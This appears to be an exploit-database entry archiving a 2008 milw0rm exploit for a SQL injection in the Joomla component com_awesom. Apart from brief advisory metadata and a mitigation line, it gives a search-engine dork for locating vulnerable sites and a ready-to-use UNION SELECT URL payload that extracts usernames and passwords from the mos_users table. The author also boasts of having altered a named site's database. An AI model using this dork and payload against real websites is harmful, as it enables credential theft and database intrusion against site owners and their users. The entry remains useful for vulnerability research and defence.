joomla SQL Injection(com_awesom)

vendor:

com_awesom

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_awesom

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

joomla SQL Injection(com_awesom)

The Joomla component com_awesom is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'listid' parameter of the 'viewlist' task in the 'index.php' file. This allows the attacker to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to update the com_awesom component to the latest version, or apply any patches or fixes provided by the vendor.

Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_awesom)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
#    DORKS 1 : allinurl :"com_awesom"
#
#   
#########################################################################   
# 
#    Ä± changed ATATÃœRK.com's db.  soo dont look
#
#   ATATÃœRK.com db si deÄŸiÅŸtirilip kullanÄ±cÄ±sÄ±na bildirilmiÅŸtir.
#
##########################################################################
EXPLOIT :

index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*


##########################################################################
# S@BUN                   www.hackturkiye.com               S@BUN
##########################################################################
# S@BUN                        GOOD LUCKY                    S@BUN
##########################################################################

	<name>Awesom</name>
	<creationDate>24/05/2004</creationDate>
	<author>Madd0</author>
	<copyright>This component is released under the GNU/GPL License</copyright>
	<authorEmail>madd0@users.sourceforge.net</authorEmail>

	<authorUrl>amazoop.sourceforge.net</authorUrl>
	<version>0.3.2</version>
	<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you 
		create lists of products to feature on your Mambo-driven site.<br />
		These lists can be customized or can be automatically generated with information provided 
		by Amazon through Amazon Web Services.<br />
		Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon 
		using your associate ID in order to earn comissions.
	</description>

# milw0rm.com [2008-02-04]